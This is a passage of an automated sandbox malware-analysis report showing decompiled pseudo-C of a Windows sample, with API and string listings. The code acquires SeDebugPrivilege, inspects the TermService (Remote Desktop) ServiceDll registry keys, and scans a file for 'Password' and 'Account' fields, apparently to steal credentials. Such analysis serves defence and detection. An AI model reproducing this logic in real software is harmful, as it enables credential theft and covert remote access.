					_t103 = PathFileExistsW( *(_t267 + 0x3c));
					__eflags = _t103;
					if(_t103 != 0) {
						L20:
						E0103DB52(_t267, _t264);
						E0103DB39(_t267);
						_t208 = _t267;
						_t106 = E0103D8FB(_t267);
						__eflags = _t106;
						if(_t106 != 0) {
							_t209 = _t267;
							_t107 = E0103D856(_t267, _t264, _t208);
							__eflags = _t107;
							if(_t107 != 0) {
								E0103DAD6(_t209);
								_t109 = E010336F7( &_v92, L"SeDebugPrivilege");
								_t110 = GetCurrentProcess();
								_t265 = _t109;
								_t111 = E01040B38(_t110, _t109);
								E01035FEB(_v96);
								__eflags = _t111;
								if(_t111 != 0) {
									_t213 =  *(_t267 + 0x2c);
									_t113 = E0104229C( *(_t267 + 0x2c));
									__eflags = _t113;
									if(_t113 != 0) {
										Sleep(0x3e8);
										_t114 =  *(_t267 + 0x4c);
										__eflags = _t114;
										if(_t114 != 0) {
											_t276 = _t203;
											__eflags = _t276 - _t114;
											do {
												E01035DE9(_t213 & 0xffffff00 | __eflags > 0x00000000);
												E0103373F( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
												E0103D3A8( &_v96);
												_t213 = _v100;
												E01035FEB(_v100);
												_t276 = _t276 + 1;
												_v100 = _t203;
												__eflags = _t276 -  *(_t267 + 0x4c);
											} while (_t276 <  *(_t267 + 0x4c));
										}
										Sleep(0x1f4);
										E0103373F( &_v92, _t267 + 0x28);
										E0103D3A8( &_v96);
										_t215 = _v100;
										E01035FEB(_v100);
										Sleep(0x1f4);
										_t120 = E0103D4DB(_t265, __eflags, _v100);
										__eflags = _t120;
										if(_t120 != 0) {
											_t121 = E01041177(_t215);
											__eflags = _t121 - 1;
											if(_t121 == 1) {
												E01040CD8(_v96);
											}
											E01035044( *((intOrPtr*)(_t267 + 0x64)), E01034C5E( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
											E01034C3B( &_v84);
											LeaveCriticalSection(_t267);
											_t203 = 8;
										} else {
											_push(_t267 + 0x60);
											_push(_t267 + 0x5c);
											_push(7);
											goto L34;
										}
									} else {
										E01040CD8(_v96);
										_push(_t267 + 0x60);
										_push(_t267 + 0x5c);
										_push(5);
										goto L34;
									}
								} else {
									E01040CD8(_v96);
									_push(_t267 + 0x60);
									_push(_t267 + 0x5c);
									_push(3);
									goto L34;
								}
							} else {
								E01040CD8(_v96);
								_push(_t267 + 0x60);
								_push(_t267 + 0x5c);
								_push(6);
								goto L34;
							}
						} else {
							E01040CD8(_v96);
							_push(_t267 + 0x60);
							_push(_t267 + 0x5c);
							_push(4);
							L34:
							E01035044( *((intOrPtr*)(_t267 + 0x64)), E01034C5E( &_v68));
							E01034C3B( &_v84);
							LeaveCriticalSection(_t267);
						}
					} else {
						E0103373F(_t281, _t271);
						E01041722( &_v32, __eflags, _t205, _t203);
						_t232 =  *((intOrPtr*)(_t267 + 0x58));
						E01045847( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
						__eflags = _v100 - _t203;
						if(_v100 != _t203) {
							_t233 =  &_v28;
							_t159 = E0104130F(_t233, _t232, _t232);
							__eflags = _t159;
							if(_t159 != 0) {
								_push(_t233);
								E0104165C( &_v28,  &_v76);
								E01041644( &_v36);
							}
							E01033148( &_v76);
							E0104140C( &_v28, __eflags);
							goto L20;
						} else {
							E01033148( &_v76);
							goto L8;
						}
					}
				} else {
					E0103373F(_t281, _t270);
					E01041722( &_v32, _t283, _t205, _t203);
					E0103373F(_t281, _t267 + 0x40);
					E01041722( &_v68, _t283,  &_v32, _t203);
					_v116 = _t203;
					_v112 = _t203;
					_v100 = _t203;
					_v96 = _t203;
					_t172 = E01041177( &_v68);
					_t244 =  *((intOrPtr*)(_t267 + 0x58));
					if(_t172 != 1) {
						E01032FCE( &_v96, E01045847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
						E01033148( &_v84);
						_t278 = _v100;
						E010330CC( &_v108, _t278, 0x12e00);
						_t248 = _t278 + 0x12e00;
						_t179 = _v104 + 0xfffed200;
						__eflags = _v104 + 0xfffed200;
					} else {
						E01032FCE( &_v96, E01045847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
						E01033148( &_v84);
						_t278 = _v100;
						E010330CC( &_v108, _t278, 0x1c800);
						_t248 = _t278 + 0x1c800;
						_t179 = _v104 + 0xfffe3800;
					}
					E010330CC( &_v76, _t248, _t179);
					_t285 = _t278;
					if(_t278 != 0) {
						_t250 =  &_v28;
						_t181 = E0104130F(_t250,  &_v76,  &_v76);
						__eflags = _t181;
						if(_t181 != 0) {
							_push(_t250);
							E0104165C( &_v28,  &_v92);
							_t250 =  &_v36;
							E01041644( &_v36);
						}
						_t251 =  &_v52;
						_t182 = E0104130F(_t251, _t250, _t250);
						__eflags = _t182;
						if(_t182 != 0) {
							_push(_t251);
							E0104165C( &_v52,  &_v76);
							E01041644( &_v60);
						}
						E01033148( &_v76);
						E01033148( &_v92);
						E0104140C( &_v52, __eflags);
						_t205 =  &_v28;
						E0104140C( &_v28, __eflags);
						goto L14;
					} else {
						E01033148( &_v76);
						E01033148( &_v92);
						E0104140C( &_v52, _t285);
						L8:
						E0104140C( &_v28, _t285);
						_t203 = _t203 | 0xffffffff;
					}
				}
				E01033148( &_v84);
				return _t203;
			}

0x0103dd72
0x0103dd72
0x0103dd78
0x0103dd7e
0x0103dd80
0x0103dd83
0x0103dd87
0x0103dd8b
0x0103dd8f
0x0103dd9d
0x0103dd9f
0x0103dda3
0x0103dda3
0x0103dda8
0x0103ddad
0x0103ddb3
0x0103ddb5
0x0103df34
0x0103df34
0x0103df39
0x0103df3f
0x0103df41
0x0103dfb5
0x0103dfb7
0x0103dfbe
0x0103dfc3
0x0103dfc5
0x0103dfca
0x0103dfcc
0x0103dfe7
0x0103dfe9
0x0103dfee
0x0103dff0
0x0103e00a
0x0103e018
0x0103e01f
0x0103e025
0x0103e029
0x0103e034
0x0103e039
0x0103e03b
0x0103e055
0x0103e058
0x0103e05d
0x0103e05f
0x0103e084
0x0103e086
0x0103e089
0x0103e08b
0x0103e08d
0x0103e08f
0x0103e091
0x0103e094
0x0103e0a4
0x0103e0ae
0x0103e0b3
0x0103e0b7
0x0103e0bf
0x0103e0c0
0x0103e0c4
0x0103e0c4
0x0103e0c8
0x0103e0d3
0x0103e0dd
0x0103e0e7
0x0103e0ec
0x0103e0f0
0x0103e0fa
0x0103e0fd
0x0103e102
0x0103e104
0x0103e134
0x0103e139
0x0103e13c
0x0103e142
0x0103e142
0x0103e15d
0x0103e166
0x0103e16c
0x0103e174
0x0103e106
0x0103e109
0x0103e10d
0x0103e10e
0x00000000
0x0103e10e
0x0103e061
0x0103e065
0x0103e06d
0x0103e071
0x0103e072
0x00000000
0x0103e072
0x0103e03d
0x0103e041
0x0103e049
0x0103e04d
0x0103e04e
0x00000000
0x0103e04e
0x0103dff2
0x0103dff6
0x0103dffe
0x0103e002
0x0103e003
0x00000000
0x0103e003
0x0103dfce
0x0103dfd2
0x0103dfda
0x0103dfde
0x0103dfdf
0x0103e110
0x0103e11d
0x0103e126
0x0103e12c
0x0103e12c
0x0103df43
0x0103df48
0x0103df51
0x0103df56
0x0103df63
0x0103df68
0x0103df6c
0x0103df7e
0x0103df82
0x0103df87
0x0103df89
0x0103df8b
0x0103df95
0x0103df9e
0x0103df9e
0x0103dfa7
0x0103dfb0
0x00000000
0x0103df6e
0x0103df72
0x00000000
0x0103df72
0x0103df6c
0x0103ddbb
0x0103ddc0
0x0103ddc9
0x0103ddd6
0x0103dddf
0x0103dde4
0x0103dde8
0x0103ddec
0x0103ddf0
0x0103ddf4
0x0103ddf9
0x0103de03
0x0103de57
0x0103de60
0x0103de65
0x0103de73
0x0103de7c
0x0103de82
0x0103de82
0x0103de05
0x0103de15
0x0103de1e
0x0103de23
0x0103de31
0x0103de3a
0x0103de40
0x0103de40
0x0103de8d
0x0103de92
0x0103de94
0x0103dec4
0x0103dec8
0x0103decd
0x0103decf
0x0103ded1
0x0103dedb
0x0103dee0
0x0103dee4
0x0103dee4
0x0103deeb
0x0103deef
0x0103def4
0x0103def6
0x0103def8
0x0103df02
0x0103df0b
0x0103df0b
0x0103df14
0x0103df1d
0x0103df26
0x0103df2b
0x0103df2f
0x00000000
0x0103de96
0x0103de9a
0x0103dea3
0x0103deac
0x0103deb1
0x0103deb5
0x0103deba
0x0103deba
0x0103de94
0x0103e179
0x0103e186

APIs

EnterCriticalSection.KERNEL32 ref: 0103DD8F

Part of subcall function 01041177: GetCurrentProcess.KERNEL32(?,?,01032EBF,?,01047668,?,?,00000000,?,?,?), ref: 0104117B

PathFileExistsW.SHLWAPI(?), ref: 0103DF39
PathFileExistsW.SHLWAPI(?), ref: 0103DDAD

Part of subcall function 0104130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,010391CE,?,?,?), ref: 01041326
Part of subcall function 0104130F: GetLastError.KERNEL32(?,?,?,010391CE,?,?,?), ref: 01041334

LeaveCriticalSection.KERNEL32(?,00000000), ref: 0103E12C

Part of subcall function 0103D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0103D88A

GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0103E01F
LeaveCriticalSection.KERNEL32(?,00000000), ref: 0103E16C

Strings

SeDebugPrivilege, xrefs: 0103E00F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
String ID: SeDebugPrivilege
API String ID: 1717069549-2896544425
Opcode ID: be3269c1611f3c3f51b4e389f4c614e18d3fce97f00234563c8cac219ae89f4e
Instruction ID: 0e569e7bb62a74ea257f46acee195f62c2b21ac83be034790609e4363914600c
Opcode Fuzzy Hash: be3269c1611f3c3f51b4e389f4c614e18d3fce97f00234563c8cac219ae89f4e
Instruction Fuzzy Hash: E1B13BB1104246ABC715EB61CCD0DEEB7ACBFA4244F400A2DF5D2971A0EF71E949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0103DB52 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103DB52(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E010336F7( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E010336F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E01042569(_t96, E010336F7( &_v16, L"ImagePath"),  &_v36);
					E01035FEB(_v16);
					E01042554( &_v8);
					if(_t50 != 0) {
						E0103300A( &_v36,  &_v12);
						E010330FE( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E01042569(_t96, E010336F7( &_v16, L"ServiceDll"),  &_v36);
								E01035FEB(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E01033549(_t72 + 0x20, E010332E6( &_v16, E0103300A( &_v36,  &_v28), _t107));
									E01035FEB(_v16);
									_v16 = _v16 & 0x00000000;
									E01035FEB(_v28);
								}
								E01042554( &_v8);
							}
						}
						E01035FEB(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E01033148( &_v36);
				E01035FEB(_v20);
				E01035FEB(_v24);
				return E01042554( &_v8);
			}

0x0103db52
0x0103db5a
0x0103db66
0x0103db69
0x0103db76
0x0103db7e
0x0103db8b
0x0103db9b
0x0103dbb6
0x0103dbc0
0x0103dbc8
0x0103dbcf
0x0103dbdc
0x0103dbe4
0x0103dbfb
0x0103dc2a
0x0103dc41
0x0103dc4b
0x0103dc50
0x0103dc52
0x0103dc6e
0x0103dc76
0x0103dc7e
0x0103dc82
0x0103dc82
0x0103dc8a
0x0103dc8a
0x0103dc2a
0x0103dc92
0x0103dc97
0x0103dc97
0x0103dbcf
0x0103dc9e
0x0103dca6
0x0103dcae
0x0103dcbe

APIs

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0103DB93

Part of subcall function 01042569: RegQueryValueExW.ADVAPI32(?,76B30770,00000000,76B30770,00000000,00000000,?,00000000,0104563F,?,?,?,01042B8B,?,?,80000001), ref: 0104258C
Part of subcall function 01042569: RegQueryValueExW.ADVAPI32(?,76B30770,00000000,76B30770,00000000,00000000,?,01042B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 010425B0

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01042554: RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 0103DBF7
StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0103DC05
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0103DC22

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0103DB6E
svchost.exe, xrefs: 0103DBEF
ImagePath, xrefs: 0103DBA5
svchost.exe -k, xrefs: 0103DBFD
ServiceDll, xrefs: 0103DC30
SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0103DB5E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrlen$CloseDispatcherExceptionFreeUserVirtual
String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
API String ID: 2553126176-3333427388
Opcode ID: 4f29aacf0b2850d98d94a7306581ed6d0b7a69579ffb4df3b3687cbe905b0482
Instruction ID: 216d083e4ae8e220619c975626adb7bd1e87b8686583db128db454fe9b908e13
Opcode Fuzzy Hash: 4f29aacf0b2850d98d94a7306581ed6d0b7a69579ffb4df3b3687cbe905b0482
Instruction Fuzzy Hash: 6B410C71D1011AABCB15EBE1DDD2DEEB77CBF68640F500169E582761A0EF745A04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01039244 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 229
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E01039244(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t102;
				char _t104;
				void* _t125;
				intOrPtr _t127;
				char _t128;
				long _t133;
				void* _t135;
				intOrPtr _t136;
				void* _t141;
				void* _t146;
				void* _t147;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr _t175;
				intOrPtr* _t177;
				CHAR* _t178;
				void* _t179;
				void* _t180;

				_v36 = __ecx;
				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t174 != 0xffffffff) {
					_t133 = GetFileSize(_t174, 0);
					_v16 = _t133;
					_t172 = E01031085(_t133);
					_v32 = _t172;
					E01031052(_t172, 0, _t133);
					_v24 = _v24 & 0x00000000;
					_t180 = _t179 + 0x10;
					ReadFile(_t174, _t172, _t133,  &_v24, 0);
					CloseHandle(_t174);
					_t175 = E01035FFA(0x400000);
					_v28 = _t175;
					_a4 = E01035FFA(0x104);
					_t96 = E01035FFA(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t135 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E01035FEB(_a4);
						E01035FEB(_v12);
						E01035FEB(_t175);
						return E01031099(_t172);
					} else {
						goto L3;
					}
					do {
						L3:
						_t167 =  *((intOrPtr*)(_t135 + _t172));
						_t13 = _t167 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t167 - 0x3d;
						if(_t167 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t175)) = _t167;
						_t141 = _t141 + 1;
						__eflags = _t167;
						if(_t167 != 0) {
							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
								__eflags =  *_t172 - 0xd0;
								_t102 = 2;
								_t146 = 9;
								_t103 =  !=  ? _t146 : _t102;
								_t168 = 0;
								_t147 = ( !=  ? _t146 : _t102) + _t135;
								_t104 =  *((intOrPtr*)(_t147 + _t172));
								__eflags = _t104 - 0x20;
								if(_t104 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									__eflags = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									 *((char*)(_t168 +  *_t60)) = 0;
									E010334D1( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E010334D1( &_v16,  *_t66);
									E01033549( &_v44, E010331AF( &_v20, __eflags,  &_v32));
									E01035FEB(_v32);
									E01033549( &_v48, E010331AF( &_v16, __eflags,  &_v32));
									E01035FEB(_v32);
									_v40 = 5;
									E01033549( &_v52, E010336F7( &_v32, 0x1047668));
									E01035FEB(_v32);
									E01031FF2(_t180 - 0x10,  &_v52);
									E01032028(_v36);
									E01035FEB(_v16);
									E01035FEB(_v20);
									E01031441( &_v52);
									goto L36;
								}
								_t58 =  &_v12; // 0x50
								_t136 =  *_t58;
								_t165 = _t147 + _t172;
								__eflags = _t165;
								while(1) {
									__eflags = _t104 - 0x7f;
									if(_t104 >= 0x7f) {
										goto L35;
									}
									__eflags = _t104 - 0x21;
									if(_t104 == 0x21) {
										goto L35;
									}
									 *((char*)(_t168 + _t136)) = _t104;
									_t168 = _t168 + 1;
									_t165 = _t165 + 1;
									_t104 =  *_t165;
									__eflags = _t104 - 0x20;
									if(_t104 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t172 - 0xd0;
						_t125 = 2;
						_t169 = 9;
						_t126 =  !=  ? _t169 : _t125;
						_t170 = 0;
						_t127 = ( !=  ? _t169 : _t125) + _t135;
						_v20 = _t127;
						_t128 =  *((intOrPtr*)(_t127 + _t172));
						__eflags = _t128 - 0x20;
						if(_t128 <= 0x20) {
							L19:
							 *((char*)(_t170 + _a4)) = 0;
							goto L28;
						}
						_t177 = _v20 + _t172;
						__eflags = _t177;
						_v20 = _t177;
						_t173 = _t177;
						_t178 = _a4;
						while(1) {
							__eflags = _t128 - 0x7f;
							if(_t128 >= 0x7f) {
								break;
							}
							_t173 = _t173 + 1;
							 *((char*)(_t170 + _t178)) = _t128;
							_t170 = _t170 + 1;
							_t128 =  *_t173;
							__eflags = _t128 - 0x20;
							if(_t128 > 0x20) {
								continue;
							}
							break;
						}
						_t175 = _v28;
						_t172 = _v32;
						goto L19;
						L28:
						_t135 = _t135 + 1;
						__eflags = _t135 - _v16;
					} while (_t135 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t174);
			}

0x0103924f
0x01039267
0x0103926c
0x01039288
0x0103928b
0x01039294
0x01039299
0x0103929c
0x010392a1
0x010392a8
0x010392b1
0x010392b8
0x010392c8
0x010392d1
0x010392db
0x010392de
0x010392e3
0x010392e5
0x010392ea
0x010392ec
0x010392ef
0x010394da
0x010394dd
0x010394e5
0x010394ec
0x00000000
0x00000000
0x00000000
0x00000000
0x010392f5
0x010392f5
0x010392f5
0x010392f8
0x010392fb
0x010392fd
0x00000000
0x00000000
0x01039303
0x01039306
0x00000000
0x00000000
0x0103930c
0x0103930f
0x01039310
0x01039312
0x010393b1
0x010393b6
0x00000000
0x00000000
0x010393b8
0x010393bd
0x00000000
0x00000000
0x010393bf
0x010393c4
0x00000000
0x00000000
0x010393c6
0x010393cb
0x00000000
0x00000000
0x010393cd
0x010393d2
0x00000000
0x00000000
0x010393d4
0x010393d9
0x00000000
0x00000000
0x010393db
0x010393e0
0x00000000
0x00000000
0x010393e2
0x010393e7
0x010393f8
0x010393fd
0x01039400
0x01039401
0x01039404
0x01039406
0x01039409
0x0103940c
0x0103940e
0x01039428
0x01039428
0x0103942b
0x0103942d
0x01039430
0x01039433
0x01039436
0x0103943d
0x01039442
0x01039448
0x0103945d
0x01039465
0x0103947a
0x01039482
0x0103948f
0x0103949f
0x010394a7
0x010394b5
0x010394bd
0x010394c5
0x010394cd
0x010394d5
0x00000000
0x010394d5
0x01039410
0x01039410
0x01039413
0x01039413
0x01039415
0x01039415
0x01039417
0x00000000
0x00000000
0x01039419
0x0103941b
0x00000000
0x00000000
0x0103941d
0x01039420
0x01039421
0x01039422
0x01039424
0x01039426
0x00000000
0x00000000
0x00000000
0x01039426
0x00000000
0x01039415
0x00000000
0x010393e7
0x01039318
0x0103931b
0x00000000
0x00000000
0x01039321
0x01039326
0x00000000
0x00000000
0x0103932c
0x01039331
0x00000000
0x00000000
0x01039337
0x0103933c
0x00000000
0x00000000
0x01039342
0x01039347
0x00000000
0x00000000
0x0103934d
0x01039352
0x00000000
0x00000000
0x01039358
0x0103935d
0x00000000
0x00000000
0x01039363
0x01039368
0x00000000
0x00000000
0x0103936a
0x0103936f
0x01039372
0x01039373
0x01039376
0x01039378
0x0103937a
0x0103937d
0x01039380
0x01039382
0x010393a6
0x010393a9
0x00000000
0x010393ad
0x01039387
0x01039387
0x01039389
0x0103938c
0x0103938e
0x01039391
0x01039391
0x01039393
0x00000000
0x00000000
0x01039395
0x01039396
0x01039399
0x0103939a
0x0103939c
0x0103939e
0x00000000
0x00000000
0x00000000
0x0103939e
0x010393a0
0x010393a3
0x00000000
0x010393e9
0x010393e9
0x010393ea
0x010393ea
0x00000000
0x010393f3
0x0103926e
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 01039261
GetLastError.KERNEL32 ref: 0103926E
CloseHandle.KERNEL32(00000000), ref: 01039275
GetFileSize.KERNEL32(00000000,00000000), ref: 01039282
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 010392B1
CloseHandle.KERNEL32(00000000), ref: 010392B8

Strings

Password, xrefs: 01039442
Password, xrefs: 01039428, 01039410, 0103943C
@Mqt, xrefs: 0103926E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateErrorLastReadSize
String ID: @Mqt$Password$Password
API String ID: 1366138817-2586040853
Opcode ID: 6bb541cb101d39938b075a94ba2a707f5b47a52f62807fcfb72fca4e22a12396
Instruction ID: eb534c7a86c96f4727c6c33384938a2c1e5d0775c3b9199c5988aed1efaa4a0f
Opcode Fuzzy Hash: 6bb541cb101d39938b075a94ba2a707f5b47a52f62807fcfb72fca4e22a12396
Instruction Fuzzy Hash: 3D8127B5D042469FEB219B68C8D0BEE7BBDAF95318F10819EE0C1AA1D2CBB55D42C711

Uniqueness

Uniqueness Score: -1.00%

Function 01040D2D Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 01040D44
CoInitialize.OLE32(00000000), ref: 01040D4B
CoCreateInstance.OLE32(010474B0,00000000,00000017,01049CC8,?,?,?,?,?,?,?,?,?,01032E47), ref: 01040D69
VariantInit.OLEAUT32(?), ref: 01040DED

Strings

WQL, xrefs: 01040DC5
root\CIMV2, xrefs: 01040D89
Name, xrefs: 01040DFF
SELECT Name FROM Win32_VideoController, xrefs: 01040DBB

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
